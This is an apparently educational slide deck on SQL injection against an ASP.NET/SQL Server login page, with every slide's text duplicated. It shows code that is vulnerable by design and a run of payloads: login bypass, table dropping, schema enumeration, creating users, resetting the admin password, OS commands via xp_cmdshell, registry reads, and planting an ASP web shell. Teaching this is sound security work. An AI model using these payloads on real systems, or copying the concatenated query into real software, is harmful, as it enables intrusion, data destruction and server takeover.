Security.NET Chapter 2. SQL Injection A form of a script injection attack Malicious user input is...
-
Upload
gordon-morton -
Category
Documents
-
view
215 -
download
3
Transcript of Security.NET Chapter 2. SQL Injection A form of a script injection attack Malicious user input is...
Security.NETSecurity.NET
Chapter 2Chapter 2
SQL InjectionSQL Injection
• A form of a script injection attack
• Malicious user input is used to affect SQL script that is executed
• A form of a script injection attack
• Malicious user input is used to affect SQL script that is executed
Example TableExample Table
CREATE TABLE [dbo].[users] (
[id] [int] NOT NULL ,
[uname] [varchar] (255) COLLATE Hebrew_CI_AS NULL ,
[pass] [varchar] (255) COLLATE Hebrew_CI_AS NULL ,
[priv] [int] NULL
) ON [PRIMARY]
CREATE TABLE [dbo].[users] (
[id] [int] NOT NULL ,
[uname] [varchar] (255) COLLATE Hebrew_CI_AS NULL ,
[pass] [varchar] (255) COLLATE Hebrew_CI_AS NULL ,
[priv] [int] NULL
) ON [PRIMARY]
Example codeExample code
sqlConnection1.Open();sqlCommand1.CommandText="select * from users where
uname='" + TextBox1.Text + "' and pass='" + TextBox2.Text + "'";
SqlDataReader d=sqlCommand1.ExecuteReader();if(d.HasRows == true)
Response.Redirect("ok.aspx");else
Response.Redirect("error.aspx");d.Close();sqlConnection1.Close();
sqlConnection1.Open();sqlCommand1.CommandText="select * from users where
uname='" + TextBox1.Text + "' and pass='" + TextBox2.Text + "'";
SqlDataReader d=sqlCommand1.ExecuteReader();if(d.HasRows == true)
Response.Redirect("ok.aspx");else
Response.Redirect("error.aspx");d.Close();sqlConnection1.Close();
Bypass the checkBypass the check
• In the user textbox type:
' or 1=1 –
You can also drop table by
'; drop table t1; --
• In the user textbox type:
' or 1=1 –
You can also drop table by
'; drop table t1; --
Find the table structure Find the table structure
• ' having 1=1—
• You get error:
Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause
• Table name: users
• Column: id
• ' having 1=1—
• You get error:
Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause
• Table name: users
• Column: id
Table structureTable structure
• ' group by users.id having 1=1--
• ' group by users.id, users.uname having 1=1--
• ' group by users.id, users.uname, users.pass having 1=1--
• ' group by users.id, users.uname, users.pass, users.priv having 1=1--
• ' group by users.id having 1=1--
• ' group by users.id, users.uname having 1=1--
• ' group by users.id, users.uname, users.pass having 1=1--
• ' group by users.id, users.uname, users.pass, users.priv having 1=1--
Data typesData types
• ' union select sum(id) from users--
• ' union select sum(uname) from users--
• ' union select sum(pass) from users--
• ' union select sum(priv) from users--
• ' union select sum(id) from users--
• ' union select sum(uname) from users--
• ' union select sum(pass) from users--
• ' union select sum(priv) from users--
Create a new userCreate a new user
• '; insert users values(5,'hacker','pass',1); --
• You can also update the administrator password for example:
'; update users set pass='12345' where uname='admin'; --
• '; insert users values(5,'hacker','pass',1); --
• You can also update the administrator password for example:
'; update users set pass='12345' where uname='admin'; --
Error messagesError messages
• Too much information
• All system messages:
select * from master..sysmessages
• Too much information
• All system messages:
select * from master..sysmessages
Extended S.P.Extended S.P.
• ' exec master..xp_cmdshell 'calc' –
• Use for D.O.S. Attack
• Find the windows users:
' exec master..xp_cmdshell 'net1 user > C:\Inetpub\wwwroot\sqlinj\u.txt' –
• ' exec master..xp_cmdshell 'calc' –
• Use for D.O.S. Attack
• Find the windows users:
' exec master..xp_cmdshell 'net1 user > C:\Inetpub\wwwroot\sqlinj\u.txt' –
Registry XPRegistry XP
• xp_regaddmultistring • xp_regdeletekey • xp_regdeletevalue • xp_regenumkeys • xp_regenumvalues • xp_regread • xp_regremovemultistring • xp_regwrite • Example:
– exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
• xp_regaddmultistring • xp_regdeletekey • xp_regdeletevalue • xp_regenumkeys • xp_regenumvalues • xp_regread • xp_regremovemultistring • xp_regwrite • Example:
– exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
Other XPOther XP
• exec master..xp_servicecontrol 'start', 'schedule' • xp_availablemedia - reveals the available drives
on the machine.• xp_dirtree - allows a directory tree to be
obtained• xp_enumdsn - enumerates ODBC data sources
on the server• xp_loginconfig - reveals information about the
security mode of the server.• xp_terminate_process - terminates a process,
given its PID
• exec master..xp_servicecontrol 'start', 'schedule' • xp_availablemedia - reveals the available drives
on the machine.• xp_dirtree - allows a directory tree to be
obtained• xp_enumdsn - enumerates ODBC data sources
on the server• xp_loginconfig - reveals information about the
security mode of the server.• xp_terminate_process - terminates a process,
given its PID
COM ComponentsCOM Components
• Tsql script:declare @o int
exec sp_OACreate 'wscript.shell', @o out
exec sp_OAMethod @o, 'run', NULL, 'notepad.exe‘
Browser:'; declare @o int exec sp_OACreate 'wscript.shell', @o out
exec sp_OAMethod @o, 'run', NULL, 'notepad.exe'--
• Tsql script:declare @o int
exec sp_OACreate 'wscript.shell', @o out
exec sp_OAMethod @o, 'run', NULL, 'notepad.exe‘
Browser:'; declare @o int exec sp_OACreate 'wscript.shell', @o out
exec sp_OAMethod @o, 'run', NULL, 'notepad.exe'--
Dynamic ASPDynamic ASP
declare @o int, @f int, @t int, @ret int exec sp_OACreate 'scripting.filesystemobject', @o out exec sp_OAMethod @o, 'createtextfile', @f out, 'c:\inetpub\
wwwroot\foo.asp', 1 exec @ret = sp_OAMethod @f, 'writeline', NULL,
'<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'
declare @o int, @f int, @t int, @ret int exec sp_OACreate 'scripting.filesystemobject', @o out exec sp_OAMethod @o, 'createtextfile', @f out, 'c:\inetpub\
wwwroot\foo.asp', 1 exec @ret = sp_OAMethod @f, 'writeline', NULL,
'<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>'